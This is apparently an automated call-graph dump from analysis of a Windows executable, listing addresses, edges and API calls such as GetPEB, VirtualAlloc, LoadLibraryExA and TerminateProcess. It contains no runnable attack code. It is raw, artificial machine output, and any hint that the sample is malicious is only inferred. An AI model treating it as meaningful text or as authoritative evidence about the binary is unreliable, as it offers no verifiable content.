6870->6871 6872 608d30 6871->6872 6872->6718 6874 608d73 6873->6874 6875 608d9e 6873->6875 6874->6875 6876 608d76 lstrcmpA 6874->6876 6875->6724 6876->6874 6876->6875 6878 603df8 6877->6878 6879 603ab0 11 API calls 6878->6879 6880 603e33 6878->6880 6881 603e0f 6879->6881 6880->6867 6881->6880 6882 6028b0 11 API calls 6881->6882 6882->6880 6886 6042fc 6883->6886 6887 60431f 6886->6887 6891 60433a 6886->6891 6888 60432a 6887->6888 6889 602978 11 API calls 6887->6889 6900 6042f4 6888->6900 6889->6888 6893 60438a 6891->6893 6894 602978 11 API calls 6891->6894 6892 604335 6892->6808 6895 602880 11 API calls 6893->6895 6898 60439c 6893->6898 6894->6893 6896 6043e5 6895->6896 6896->6898 6903 6042dc 6896->6903 6898->6892 6899 6042fc 15 API calls 6898->6899 6899->6898 6901 6044b4 13 API calls 6900->6901 6902 6042f9 6901->6902 6902->6892 6906 6041bc 6903->6906 6905 6042e7 6905->6898 6907 6041d1 6906->6907 6920 6041f7 6906->6920 6909 6041d6 6907->6909 6910 604219 6907->6910 6908 603a40 11 API calls 6908->6920 6912 6041db 6909->6912 6913 60422d 6909->6913 6923 604214 6910->6923 6925 603f2c 6910->6925 6914 6041e0 6912->6914 6921 604241 6912->6921 6913->6923 6932 604088 6913->6932 6916 6041e5 6914->6916 6922 604262 6914->6922 6919 604293 6916->6919 6916->6920 6916->6923 6917 6041bc 15 API calls 6917->6921 6919->6923 6946 6044f0 6919->6946 6920->6908 6920->6923 6921->6917 6921->6923 6922->6923 6937 6040a0 6922->6937 6923->6905 6926 603ee8 6925->6926 6927 603f34 6925->6927 6928 603f04 6926->6928 6929 603ef6 SysFreeString 6926->6929 6927->6926 6930 603f3f SysReAllocStringLen 6927->6930 6928->6910 6929->6928 6930->6926 6931 603f4f 6930->6931 6931->6910 6933 604091 6932->6933 6934 604098 6932->6934 6933->6913 6935 602978 11 API calls 6934->6935 6936 60409f 6935->6936 6936->6913 6938 6040ba 6937->6938 6939 603a40 11 API calls 6938->6939 6940 603f2c 2 API calls 6938->6940 6941 604088 11 API calls 6938->6941 6942 6041bc 15 API calls 6938->6942 6943 6041a6 6938->6943 6944 6040a0 15 API calls 6938->6944 6945 6044f0 13 API calls 6938->6945 6939->6938 6940->6938 6941->6938 6942->6938 6943->6922 6944->6938 6945->6938 6948 6044f7 6946->6948 6947 604511 6947->6919 6948->6947 6949 6044b4 13 API calls 6948->6949 6949->6947 6951 608fbe 6950->6951 6954 608fc7 6951->6954 6960 608f38 6951->6960 6953 608fe4 6953->6863 6954->6953 6955 603a40 11 API calls 6954->6955 6955->6953 6970 602a24 6956->6970 6958 604faf CreateWindowExA 6959 604fe7 6958->6959 6959->6856 6961 603e84 11 API calls 6960->6961 6962 608f5e 6961->6962 6963 608f67 GetModuleFileNameA 6962->6963 6964 603e84 11 API calls 6963->6964 6965 608f7d 6964->6965 6966 603a40 11 API calls 6965->6966 6967 608f87 6966->6967 6968 6039ec 11 API calls 6967->6968 6969 608f9c 6968->6969 6969->6954 6970->6958 7473 6075f0 7474 607534 42 API calls 7473->7474 7475 6075f8 7474->7475 6971 607cf2 6972 607cf4 6971->6972 6976 607c80 GetLocaleInfoA 6972->6976 6982 603c34 6976->6982 6983 603c3f 6982->6983 6355 60107a RaiseException 7155 602f7a 7156 602f6b RegCloseKey 7155->7156 6356 604a7c 6359 6034a0 6356->6359 6362 604ddc 6359->6362 6361 6034a5 6363 604e11 TlsGetValue 6362->6363 6364 604deb 6362->6364 6365 604df6 6363->6365 6366 604e1b 6363->6366 6364->6361 6370 604d98 6365->6370 6366->6361 6368 604dfb TlsGetValue 6369 604e0a 6368->6369 6369->6361 6371 604d9e 6370->6371 6374 604dc2 6371->6374 6376 604d84 LocalAlloc 6371->6376 6373 604dbe 6373->6374 6375 604dce TlsSetValue 6373->6375 6374->6368 6375->6374 6376->6373 7157 608742 7158 608744 7157->7158 7159 60879e 7158->7159 7171 603790 7158->7171 7161 608768 7162 60878a 7161->7162 7164 603a40 11 API calls 7161->7164 7175 60796c 7162->7175 7164->7162 7167 608794 7182 608288 GetModuleHandleA 7167->7182 7173 60379c 7171->7173 7172 604b70 42 API calls 7172->7173 7173->7172 7174 6037b1 7173->7174 7174->7161 7176 607364 42 API calls 7175->7176 7177 60797e 7176->7177 7178 607364 42 API calls 7177->7178 7179 607995 7178->7179 7180 607a70 GetVersionExA 7179->7180 7181 607a87 7180->7181 7181->7167 7183 6082a9 7182->7183 7184 608299 GetProcAddress 7182->7184 7185 607ee4 7183->7185 7184->7183 7186 607eec 7185->7186 7186->7186 7259 607d6c GetThreadLocale 7186->7259 7191 607f1a GetThreadLocale 7193 606adc 12 API calls 7191->7193 7194 607f33 7193->7194 7195 603a40 11 API calls 7194->7195 7196 607f40 7195->7196 7197 606adc 12 API calls 7196->7197 7198 607f55 7197->7198 7199 606adc 12 API calls 7198->7199 7200 607f79 7199->7200 7288 606b28 GetLocaleInfoA 7200->7288 7203 606b28 GetLocaleInfoA 7204 607fa9 7203->7204 7205 606adc 12 API calls 7204->7205 7206 607fc3 7205->7206 7207 606b28 GetLocaleInfoA 7206->7207 7208 607fe0 7207->7208 7209 606adc 12 API calls 7208->7209 7210 607ffa 7209->7210 7290 606e14 7210->7290 7213 603a40 11 API calls 7214 608012 7213->7214 7215 606adc 12 API calls 7214->7215 7216 608027 7215->7216 7217 606e14 14 API calls 7216->7217 7218 608032 7217->7218 7219 603a40 11 API calls 7218->7219 7220 60803f 7219->7220 7221 606b28 GetLocaleInfoA 7220->7221 7222 60804d 7221->7222 7223 606adc 12 API calls 7222->7223 7224 608067 7223->7224 7225 603a40 11 API calls 7224->7225 7226 608074 7225->7226 7227 606adc 12 API calls 7226->7227 7228 608089 7227->7228 7229 603a40 11 API calls 7228->7229 7230 608096 7229->7230 7231 6039ec 11 API calls 7230->7231 7232 60809e 7231->7232 7233 6039ec 11 API calls 7232->7233 7234 6080a6 7233->7234 7235 606adc 12 API calls 7234->7235 7236 6080bb 7235->7236 7237 6080d8 7236->7237 7238 6080c9 7236->7238 7240 603a84 11 API calls 7237->7240 7309 603a84 7238->7309 7241 6080d6 7240->7241 7242 606adc 12 API calls 7241->7242 7244 6080fa 7242->7244 7243 608138 7313 603cac 7243->7313 7244->7243 7245 606adc 12 API calls 7244->7245 7247 60811d 7245->7247 7252 60813a 7247->7252 7253 60812b 7247->7253 7256 603a84 11 API calls 7252->7256 7255 603a84 11 API calls 7253->7255 7255->7243 7256->7243 7260 607d9f 7259->7260 7261 607e8f GetSystemMetrics GetSystemMetrics 7260->7261 7265 607de2 7260->7265 7262 607eb6 7261->7262 7263 607deb 7261->7263 7264 607cf4 14 API calls 7262->7264 7269 606b8c GetThreadLocale 7263->7269 7264->7263 7265->7263 7322 607cf4 7265->7322 7267 607e04 7267->7263 7268 607e45 GetStringTypeExA 7267->7268 7268->7263 7272 606bbf 7269->7272 7270 606b50 43 API calls 7270->7272 7271 603a40 11 API calls 7271->7272 7272->7270 7272->7271 7273 606c11 7272->7273 7274 606b50 43 API calls 7273->7274 7275 603a40 11 API calls 7273->7275 7276 606c84 7273->7276 7274->7273 7275->7273 7277 603a10 11 API calls 7276->7277 7278 606c9e 7277->7278 7278->7191 7279 606d64 GetThreadLocale 7278->7279 7280 606adc 12 API calls 7279->7280 7281 606d90 7280->7281 7282 606de5 7281->7282 7283 606da9 GetThreadLocale EnumCalendarInfoA 7281->7283 7285 6039ec 11 API calls 7282->7285 7284 606dc6 7283->7284 7284->7284 7286 606dd2 GetThreadLocale EnumCalendarInfoA 7284->7286 7287 606dfa 7285->7287 7286->7282 7287->7191 7289 606b44 7288->7289 7289->7203 7291 606e3f GetThreadLocale 7290->7291 7292 6039ec 11 API calls 7290->7292 7293 606adc 12 API calls 7291->7293 7292->7291 7294 606e57 7293->7294 7295 606e70 7294->7295 7307 606ecf 7294->7307 7296 606ec1 7295->7296 7305 606e8c 7295->7305 7297 603a40 11 API calls 7296->7297 7298 606ebc 7297->7298 7300 603a10 11 API calls 7298->7300 7299 607bb4 CharNextA 7299->7307 7301 606fdd 7300->7301 7301->7213 7302 603e44 11 API calls 7302->7307 7303 603c68 11 API calls 7303->7307 7304 603bb8 11 API calls 7304->7305 7305->7298 7305->7304 7306 603c68 11 API calls 7305->7306 7306->7305 7307->7298 7307->7299 7307->7302 7307->7303 7308 603bb8 11 API calls 7307->7308 7308->7307 7311 603a88 7309->7311 7310 603aac 7310->7241 7311->7310 7312 6028b0 11 API calls 7311->7312 7312->7310 7314 603cbd 7313->7314 7315 603ce3 7314->7315 7316 603cfa 7314->7316 7317 603e84 11 API calls 7315->7317 7318 603ab0 11 API calls 7316->7318 7320 603cf0 7317->7320 7318->7320 7319 603d2b 7320->7319 7321 603a40 11 API calls 7320->7321 7321->7319 7323 607c80 13 API calls 7322->7323 7324 607d0c GetCPInfo 7323->7324 7325 607d16 7324->7325 7325->7267 6986 6048c3 lstrcpynA GetThreadLocale GetLocaleInfoA 6987 6049f3 6986->6987 6988 6048fa 6986->6988 6988->6987 6989 60490a lstrlenA 6988->6989 6990 604923 6989->6990 6990->6987 6991 604951 lstrcpynA LoadLibraryExA 6990->6991 6992 60497d 6990->6992 6991->6992 6992->6987 6993 604987 lstrcpynA LoadLibraryExA 6992->6993 6993->6987 6994 6049bd lstrcpynA LoadLibraryExA 6993->6994 6994->6987 7330 608744 7331 60879e 7330->7331 7332 60875e 7330->7332 7333 603790 42 API calls 7332->7333 7335 608768 7333->7335 7334 60878a 7336 60796c 42 API calls 7334->7336 7335->7334 7337 603a40 11 API calls 7335->7337 7338 60878f 7336->7338 7337->7334 7339 607a70 GetVersionExA 7338->7339 7340 608794 7339->7340 7341 608288 2 API calls 7340->7341 7342 608799 7341->7342 7343 607ee4 60 API calls 7342->7343 7343->7331 7476 6085c4 7477 6085e1 7476->7477 7478 60872b 7476->7478 7522 60825c 7477->7522 7480 6085f0 7481 603f9c 13 API calls 7480->7481 7482 60860a 7481->7482 7483 603f9c 13 API calls 7482->7483 7484 60861f 7483->7484 7485 603f9c 13 API calls 7484->7485 7486 608634 7485->7486 7487 6039ec 11 API calls 7486->7487 7488 60863e 7487->7488 7489 6044b4 13 API calls 7488->7489 7490 60864e 7489->7490 7491 6044b4 13 API calls 7490->7491 7492 60865e 7491->7492 7493 603f9c 13 API calls 7492->7493 7494 608673 7493->7494 7495 603f9c 13 API calls 7494->7495 7496 608688 7495->7496 7497 603f9c 13 API calls 7496->7497 7498 60869d 7497->7498 7499 603f9c 13 API calls 7498->7499 7500 6086b2 7499->7500 7501 603f9c 13 API calls 7500->7501 7502 6086c7 7501->7502 7503 6039ec 11 API calls 7502->7503 7504 6086d1 7503->7504 7505 6039ec 11 API calls 7504->7505 7506 6086db 7505->7506 7507 6039ec 11 API calls 7506->7507 7508 6086e5 7507->7508 7509 6039ec 11 API calls 7508->7509 7510 6086ef 7509->7510 7511 6039ec 11 API calls 7510->7511 7512 6086f9 7511->7512 7513 6039ec 11 API calls 7512->7513 7514 608703 7513->7514 7515 6039ec 11 API calls 7514->7515 7516 60870d 7515->7516 7517 6039ec 11 API calls 7516->7517 7518 608717 7517->7518 7519 603ef0 SysFreeString 7518->7519 7520 608721 7519->7520 7521 6039ec 11 API calls 7520->7521 7521->7478 7524 608268 7522->7524 7523 608283 7523->7480 7524->7523 7525 6028b0 11 API calls 7524->7525 7525->7524 5892 401966 5901 401a0b 5892->5901 5895 401977 GetCurrentProcess TerminateProcess 5898 401988 5895->5898 5896 4019f2 5904 401a14 5896->5904 5897 4019f9 ExitProcess 5898->5896 5898->5897 5902 40268d 20 API calls 5901->5902 5903 40196c 5902->5903 5903->5895 5903->5898 5907 4026ee LeaveCriticalSection 5904->5907 5906 4019f7 5907->5906 6377 607046 6378 607048 VirtualQuery 6377->6378 6379 607091 GetModuleFileNameA 6378->6379 6380 607075 GetModuleFileNameA 6378->6380 6381 6070af 6379->6381 6380->6379 6380->6381 6382 60456c 30 API calls 6381->6382 6383 607146 LoadStringA 6382->6383 6384 607159 6383->6384 6387 606470 6384->6387 6386 6071c8 6388 6064a0 6387->6388 6389 606481 6387->6389 6388->6386 6389->6388 6390 6060f8 42 API calls 6389->6390 6390->6388 7526 602fc7 7527 602f66 RegCloseKey 7526->7527 7528 602fcb 7526->7528 7530 6033c9 7531 604ddc 4 API calls 7530->7531 7532 6033ce 7531->7532 6995 6036ca 6996 6036cf 6995->6996 7001 60344c 6996->7001 6998 6036d4 6999 6036d9 6998->6999 7000 6034a0 4 API calls 6998->7000 7000->6999 7002 604ddc 4 API calls 7001->7002 7003 60345c 7002->7003 7003->6998 7533 6089cd 7534 6089ac 7533->7534 7535 6044b4 13 API calls 7534->7535 7536 6089ba 7535->7536 7537 603a10 11 API calls 7536->7537 7538 6089c7 7537->7538 7543 6075d5 7544 6075bf 7543->7544 7545 6039ec 11 API calls 7544->7545 7546 6075c7 7545->7546 7547 6039ec 11 API calls 7546->7547 7548 6075cf 7547->7548 7004 403cf6 7005 403d04 7004->7005 7006 403d08 LCMapStringW 7005->7006 7007 403cbc 7005->7007 7006->7007 7008 403d20 WideCharToMultiByte 7006->7008 7008->7007 7549 4023f8 7552 402400 7549->7552 7550 402492 7551 402308 RtlUnwind 7551->7552 7552->7550 7552->7551 6391 403e7a 6392 403e81 6391->6392 6393 403eb2 6392->6393 6394 403e89 MultiByteToWideChar 6392->6394 6394->6393 6395 403ea2 GetStringTypeW 6394->6395 6395->6393 7352 60795c 7357 6071e0 7352->7357 7355 6039d4 7 API calls 7356 60796b 7355->7356 7371 607048 VirtualQuery 7357->7371 7359 6071f4 7360 60725c 7359->7360 7361 6071fe 7359->7361 7362 60456c 30 API calls 7360->7362 7380 602a74 7361->7380 7364 607276 LoadStringA MessageBoxA 7362->7364 7367 607292 7364->7367 7367->7355 7370 60722c GetStdHandle WriteFile GetStdHandle WriteFile 7370->7367 7372 607091 GetModuleFileNameA 7371->7372 7373 607075 GetModuleFileNameA 7371->7373 7378 6070af 7372->7378 7373->7372 7373->7378 7374 60456c 30 API calls 7375 607146 LoadStringA 7374->7375 7376 607159 7375->7376 7377 606470 42 API calls 7376->7377 7379 6071c8 7377->7379 7378->7374 7379->7359 7387 602a2c 7380->7387 7383 602984 7384 604ddc 4 API calls 7383->7384 7385 60298c CharToOemA 7384->7385 7386 605fb0 7385->7386 7386->7370 7388 602a38 7387->7388 7389 602a6d 7388->7389 7390 6029a4 4 API calls 7388->7390 7389->7383 7390->7389 6400 402400 6401 402492 6400->6401 6402 40241e 6400->6402 6402->6401 6404 402308 RtlUnwind 6402->6404 6405 402320 6404->6405 6405->6402 7553 601ba1 7554 601b7e 7553->7554 7555 601b91 DeleteCriticalSection 7554->7555 7556 601b87 LeaveCriticalSection 7554->7556 7556->7555 7391 605f28 7392 605f3e GetDiskFreeSpaceA 7391->7392 7394 605f83 7392->7394 7399 603b2c 7400 603b45 7399->7400 7401 603b4e 7399->7401 7402 6039ec 11 API calls 7400->7402 7403 603b81 7401->7403 7414 603b0c WideCharToMultiByte 7401->7414 7407 603b4c 7402->7407 7404 603e84 11 API calls 7403->7404 7406 603b8e 7404->7406 7415 603b0c WideCharToMultiByte 7406->7415 7408 603b6c 7408->7403 7410 603b72 7408->7410 7411 603adc 11 API calls 7410->7411 7411->7407 7412 603b9c 7413 603e84 11 API calls 7412->7413 7413->7407 7414->7408 7415->7412 7420 607532 7421 607534 7420->7421 7422 607569 7421->7422 7423 60755d 7421->7423 7424 604b70 42 API calls 7422->7424 7426 607567 7422->7426 7425 603a84 11 API calls 7423->7425 7424->7426 7425->7426 7427 604b70 42 API calls 7426->7427 7428 6075a1 7427->7428 7429 6072e4 42 API calls 7428->7429 7430 6075b0 7429->7430 7431 6039ec 11 API calls 7430->7431 7432 6075c7 7431->7432 7433 6039ec 11 API calls 7432->7433 7434 6075cf 7433->7434 7577 6027b4 7578 6027c9 7577->7578 7579 6027ce 7577->7579 7592 6019d0 InitializeCriticalSection 7578->7592 7581 6027f3 EnterCriticalSection 7579->7581 7582 6027fd 7579->7582 7584 6027d2 7579->7584 7581->7582 7599 6025b0 7582->7599 7586 60280a 7588 602862 LeaveCriticalSection 7586->7588 7589 60286c 7586->7589 7588->7589 7590 602816 7590->7586 7620 6023d8 7590->7620 7593 6019f5 EnterCriticalSection 7592->7593 7594 6019ff 7592->7594 7593->7594 7595 601a1d LocalAlloc 7594->7595 7596 601a37 7595->7596 7597 601a97 7596->7597 7598 601a8d LeaveCriticalSection 7596->7598 7597->7579 7598->7597 7600 6025c4 7599->7600 7601 6025e7 7600->7601 7602 602686 7600->7602 7604 6025f6 7600->7604 7601->7586 7609 60222c 7601->7609 7602->7601 7607 602721 7602->7607 7637 601f74 7602->7637 7645 602078 7602->7645 7604->7601 7634 601cbc 7604->7634 7607->7601 7641 601e7c 7607->7641 7610 602243 7609->7610 7611 60223e 7609->7611 7613 602270 EnterCriticalSection 7610->7613 7614 60227a 7610->7614 7619 60224f 7610->7619 7612 6019d0 4 API calls 7611->7612 7612->7610 7613->7614 7614->7619 7727 6020e4 7614->7727 7617 6023c7 7617->7590 7618 6023bd LeaveCriticalSection 7618->7617 7619->7590 7621 6023f6 7620->7621 7622 6023f1 7620->7622 7624 602427 EnterCriticalSection 7621->7624 7627 602431 7621->7627 7628 6023fa 7621->7628 7623 6019d0 4 API calls 7622->7623 7623->7621 7624->7627 7625 602447 7629 602594 LeaveCriticalSection 7625->7629 7630 60259e 7625->7630 7626 6024dd 7626->7628 7631 601f74 7 API calls 7626->7631 7627->7625 7627->7626 7632 602509 7627->7632 7628->7586 7629->7630 7630->7586 7631->7628 7632->7625 7633 601e7c 7 API calls 7632->7633 7633->7625 7635 6023d8 9 API calls 7634->7635 7636 601cdd 7635->7636 7636->7601 7638 601f86 7637->7638 7639 601f7d 7637->7639 7638->7602 7639->7638 7640 601cbc 9 API calls 7639->7640 7640->7638 7642 601ea1 7641->7642 7643 601f17 7641->7643 7642->7601 7643->7642 7650 601dc0 7643->7650 7705 6017f8 7645->7705 7647 60208d 7648 60209a 7647->7648 7716 601fc0 7647->7716 7648->7602 7651 601dd4 7650->7651 7652 601e22 7651->7652 7653 601e0c 7651->7653 7662 601e70 7651->7662 7654 60193c 3 API calls 7652->7654 7663 60193c 7653->7663 7656 601e20 7654->7656 7656->7662 7673 601c80 7656->7673 7658 601e43 7659 601e65 7658->7659 7678 601ce0 7658->7678 7683 60136c 7659->7683 7662->7642 7664 601966 7663->7664 7672 6019c3 7663->7672 7687 601694 7664->7687 7669 60199e 7671 60136c LocalAlloc 7669->7671 7669->7672 7671->7672 7672->7656 7674 601c92 7673->7674 7675 601ca5 7673->7675 7676 601e7c 9 API calls 7674->7676 7675->7658 7677 601ca2 7676->7677 7677->7658 7679 601cf3 7678->7679 7680 601ce5 7678->7680 7679->7659 7681 601cbc 9 API calls 7680->7681 7682 601cf2 7681->7682 7682->7659 7684 60137e 7683->7684 7685 6013a1 7684->7685 7686 601254 LocalAlloc 7684->7686 7685->7662 7686->7685 7690 6016e5 7687->7690 7688 601746 7691 6012e4 7688->7691 7689 601717 VirtualFree 7689->7690 7690->7688 7690->7689 7692 6012ff 7691->7692 7699 601254 7692->7699 7695 60150c 7698 60153a 7695->7698 7696 6015ae 7696->7669 7697 601578 VirtualFree 7697->7698 7698->7696 7698->7697 7702 6011c8 7699->7702 7703 6011d6 LocalAlloc 7702->7703 7704 6011ed 7702->7704 7703->7704 7704->7669 7704->7695 7708 60181b 7705->7708 7706 601494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 7706->7708 7707 6018e1 7713 60188d 7707->7713 7723 6015d4 7707->7723 7708->7706 7708->7707 7710 6012e4 LocalAlloc 7708->7710 7711 6018c7 7708->7711 7712 60187c 7708->7712 7710->7708 7714 60150c VirtualFree 7711->7714 7715 60150c VirtualFree 7712->7715 7713->7647 7714->7713 7715->7713 7717 601f74 9 API calls 7716->7717 7718 601fd4 7717->7718 7719 6012e4 LocalAlloc 7718->7719 7720 601fe4 7719->7720 7721 601c80 9 API calls 7720->7721 7722 601fec 7720->7722 7721->7722 7722->7648 7725 601627 7723->7725 7724 601676 7724->7713 7725->7724 7726 60165d VirtualAlloc 7725->7726 7726->7724 7726->7725 7730 6020fb 7727->7730 7728 60213c 7729 601e7c 9 API calls 7728->7729 7732 602163 7728->7732 7729->7732 7730->7728 7730->7732 7733 60204c 7730->7733 7732->7617 7732->7618 7738 601750 7733->7738 7735 60205c 7736 602069 7735->7736 7737 601fc0 9 API calls 7735->7737 7736->7730 7737->7736 7742 60176e 7738->7742 7739 60177c 7741 6015d4 VirtualAlloc 7739->7741 7746 60178a 7741->7746 7742->7739 7743 6012e4 LocalAlloc 7742->7743 7744 6017dc 7742->7744 7742->7746 7747 601430 7742->7747 7743->7742 7745 60150c VirtualFree 7744->7745 7745->7746 7746->7735 7748 60143f VirtualAlloc 7747->7748 7750 60146c 7748->7750 7751 60148f 7748->7751 7752 601254 LocalAlloc 7750->7752 7751->7742 7753 601478 7752->7753 7753->7751 7754 60147c VirtualFree 7753->7754 7754->7751 6410 607436 6411 60743a 6410->6411 6412 60743f 6410->6412 6414 603004 6411->6414 6419 603094 6414->6419 6417 6028b0 11 API calls 6418 603015 6417->6418 6418->6412 6420 60309a 6419->6420 6421 60300e 6420->6421 6423 603f50 6420->6423 6421->6417 6424 603f62 6423->6424 6426 603f7b 6424->6426 6427 603f9c 6424->6427 6426->6420 6428 603fa5 6427->6428 6449 603fda 6427->6449 6429 603fba 6428->6429 6430 603fdf 6428->6430 6431 603ffc 6429->6431 6432 603fbe 6429->6432 6433 603ff0 6430->6433 6434 603fe6 6430->6434 6436 604003 6431->6436 6437 60400a 6431->6437 6438 603fc2 6432->6438 6439 604013 6432->6439 6435 603a10 11 API calls 6433->6435 6440 6039ec 11 API calls 6434->6440 6435->6449 6452 603ef0 6436->6452 6455 603f08 6437->6455 6443 604022 6438->6443 6444 603fc6 6438->6444 6439->6449 6459 603f84 6439->6459 6440->6449 6446 603f9c 13 API calls 6443->6446 6443->6449 6448 603fca 6444->6448 6450 604040 6444->6450 6446->6443 6447 603f50 13 API calls 6447->6450 6448->6449 6464 6044b4 6448->6464 6449->6424 6450->6447 6450->6449 6453 603f04 6452->6453 6454 603ef6 SysFreeString 6452->6454 6453->6449 6454->6453 6456 603f0e 6455->6456 6457 603f14 SysFreeString 6456->6457 6458 603f26 6456->6458 6457->6456 6458->6449 6460 603f94 6459->6460 6461 603f8d 6459->6461 6462 602978 11 API calls 6460->6462 6461->6439 6463 603f9b 6462->6463 6463->6439 6465 6044ec 6464->6465 6467 6044ba 6464->6467 6465->6448 6466 6044e4 6468 6028b0 11 API calls 6466->6468 6467->6465 6467->6466 6469 603f9c 13 API calls 6467->6469 6468->6465 6469->6466 7439 60373a 7440 60373f 7439->7440 7441 60344c 4 API calls 7440->7441 7442 603744 7441->7442 7443 603749 7442->7443 7444 6034a0 4 API calls 7442->7444 7444->7443 7755 6085ba 7757 6085c4 7755->7757 7756 60872b 7757->7756 7758 60825c 11 API calls 7757->7758 7759 6085f0 7758->7759 7760 603f9c 13 API calls 7759->7760 7761 60860a 7760->7761 7762 603f9c 13 API calls 7761->7762 7763 60861f 7762->7763 7764 603f9c 13 API calls 7763->7764 7765 608634 7764->7765 7766 6039ec 11 API calls 7765->7766 7767 60863e 7766->7767 7768 6044b4 13 API calls 7767->7768 7769 60864e 7768->7769 7770 6044b4 13 API calls 7769->7770 7771 60865e 7770->7771 7772 603f9c 13 API calls 7771->7772 7773 608673 7772->7773 7774 603f9c 13 API calls 7773->7774 7775 608688 7774->7775 7776 603f9c 13 API calls 7775->7776 7777 60869d 7776->7777 7778 603f9c 13 API calls 7777->7778 7779 6086b2 7778->7779 7780 603f9c 13 API calls 7779->7780 7781 6086c7 7780->7781 7782 6039ec 11 API calls 7781->7782 7783 6086d1 7782->7783 7784 6039ec 11 API calls 7783->7784 7785 6086db 7784->7785 7786 6039ec 11 API calls 7785->7786 7787 6086e5 7786->7787 7788 6039ec 11 API calls 7787->7788 7789 6086ef 7788->7789 7790 6039ec 11 API calls 7789->7790 7791 6086f9 7790->7791 7792 6039ec 11 API calls 7791->7792 7793 608703 7792->7793 7794 6039ec 11 API calls 7793->7794 7795 60870d 7794->7795 7796 6039ec 11 API calls 7795->7796 7797 608717 7796->7797 7798 603ef0 SysFreeString 7797->7798 7799 608721 7798->7799 7800 6039ec 11 API calls 7799->7800 7800->7756 6470 60983c 6471 609855 6470->6471 6472 60985f 6470->6472 6473 6039ec 11 API calls 6471->6473 6473->6472 6474 604c3c 6475 604c55 6474->6475 6476 604c78 6474->6476 6484 602a80 6475->6484 6479 602a80 4 API calls 6480 604c69 6479->6480 6481 602a80 4 API calls 6480->6481 6482 604c73 6481->6482 6491 601aa8 6482->6491 6485 602a90 6484->6485 6486 602abf 6484->6486 6485->6486 6489 602a96 6485->6489 6487 602abd 6486->6487 6488 6029a4 4 API calls 6486->6488 6487->6479 6488->6487 6489->6487 6503 6029a4 6489->6503 6492 601ba3 6491->6492 6493 601abb 6491->6493 6492->6476 6494 601ad2 EnterCriticalSection 6493->6494 6495 601adc LocalFree 6493->6495 6494->6495 6496 601b1a 6495->6496 6497 601aff VirtualFree 6496->6497 6498 601b24 6496->6498 6497->6496 6499 601b50 LocalFree 6498->6499 6500 601b71 6498->6500 6499->6499 6499->6500 6501 601b91 DeleteCriticalSection 6500->6501 6502 601b87 LeaveCriticalSection 6500->6502 6501->6476 6502->6501 6504 604ddc 4 API calls 6503->6504 6505 6029ac 6504->6505 6505->6487 7801 6087bc 7802 608842 7801->7802 7803 6087ce 7801->7803 7804 608850 7802->7804 7805 6039ec 11 API calls 7802->7805 7803->7802 7815 6087d2 7803->7815 7809 609624 13 API calls 7804->7809 7805->7804 7806 608826 7807 608dd8 13 API calls 7806->7807 7810 608839 7807->7810 7808 608862 7811 609624 13 API calls 7808->7811 7809->7808 7812 608a40 GetPEB 7810->7812 7813 608874 7811->7813 7814 60883e 7812->7814 7816 609624 13 API calls 7813->7816 7822 6039ec 11 API calls 7814->7822 7815->7804 7815->7806 7815->7808 7847 608a50 GetPEB 7815->7847 7817 608886 7816->7817 7819 603a40 11 API calls 7817->7819 7821 608893 7819->7821 7820 60881d 7820->7806 7848 608a6c GetPEB 7820->7848 7823 605e3c 42 API calls 7821->7823 7822->7804 7830 60889b 7823->7830 7825 6088d2 7826 609624 13 API calls 7825->7826 7828 6088e4 7826->7828 7827 605d50 11 API calls 7827->7830 7829 605e3c 42 API calls 7828->7829 7845 6088ec 7829->7845 7830->7825 7830->7827 7831 609624 13 API calls 7830->7831 7833 603c68 11 API calls 7830->7833 7831->7830 7832 60899f 7835 6044b4 13 API calls 7832->7835 7833->7830 7834 608a88 11 API calls 7834->7845 7836 6089ba 7835->7836 7837 603a10 11 API calls 7836->7837 7839 6089c7 7837->7839 7838 608b94 11 API calls 7838->7845 7840 603a84 11 API calls 7840->7845 7841 605e3c 42 API calls 7841->7845 7842 608c1c 11 API calls 7842->7845 7843 608cb8 11 API calls 7843->7845 7844 608eb4 15 API calls 7844->7845 7845->7832 7845->7834 7845->7838 7845->7840 7845->7841 7845->7842 7845->7843 7845->7844 7846 609014 18 API calls 7845->7846 7846->7845 7847->7820 7848->7806 7024 6074be 7025 6074f3 7024->7025 7026 6074ce 7024->7026 7035 607460 7025->7035 7026->7025 7027 6074f5 7026->7027 7029 607505 7026->7029 7031 6072a8 7029->7031 7032 6072af 7031->7032 7033 603a40 11 API calls 7032->7033 7034 6072c7 7033->7034 7034->7027 7043 6029b4 7035->7043 7038 607484 7040 6072a8 11 API calls 7038->7040 7039 607499 7041 6073a0 42 API calls 7039->7041 7042 607497 7040->7042 7041->7042 7042->7027 7044 604ddc 4 API calls 7043->7044 7045 6029ba 7044->7045 7046 604ddc 4 API calls 7045->7046 7047 6029c5 7046->7047 7047->7038 7047->7039 7048 6032be 7053 6033a1 7048->7053 7054 6032d1 7048->7054 7049 603344 7050 603339 7049->7050 7051 60335f UnhandledExceptionFilter 7049->7051 7052 604ddc 4 API calls 7050->7052 7051->7050 7051->7053 7052->7053 7054->7049 7054->7053 7055 603324 UnhandledExceptionFilter 7054->7055 7055->7050 7055->7053 7056 607884 7057 60785b 7056->7057 7058 6039ec 11 API calls 7057->7058 7059 607866 7058->7059 7060 603a10 11 API calls 7059->7060 7061 607876 7060->7061 7062 6039ec 11 API calls 7061->7062 7063 60787e 7062->7063 7849 603186 7850 603191 7849->7850 7851 60344c 4 API calls 7850->7851 7852 6031a4 7851->7852 7857 603588 7858 603599 7857->7858 7861 6035fa 7857->7861 7859 6035a2 UnhandledExceptionFilter 7858->7859 7860 6034e8 7858->7860 7859->7860 7859->7861 7860->7861 7862 602920 7 API calls 7860->7862 7863 603584 7862->7863 6510 60760a 6513 607364 6510->6513 6512 60761e 6514 60736b 6513->6514 6515 604b70 42 API calls 6514->6515 6516 607383 6515->6516 6516->6512 7445 603b0a 7446 603b0c WideCharToMultiByte 7445->7446 7064 607890 7065 6078b5 7064->7065 7066 6078cc 7065->7066 7067 6078e3 7065->7067 7068 6078c6 7065->7068 7069 6072a8 11 API calls 7066->7069 7078 6076bc 7067->7078 7068->7066 7070 6078ee 7068->7070 7074 6078df 7069->7074 7072 604b70 42 API calls 7070->7072 7073 60790d 7072->7073 7103 6072e4 7073->7103 7076 6039ec 11 API calls 7074->7076 7077 60794a 7076->7077 7079 60770c 7078->7079 7080 6076fd 7078->7080 7082 604b70 42 API calls 7079->7082 7081 604b70 42 API calls 7080->7081 7083 60770a 7081->7083 7084 607719 VirtualQuery 7082->7084 7083->7084 7085 6077f1 7084->7085 7086 60773b 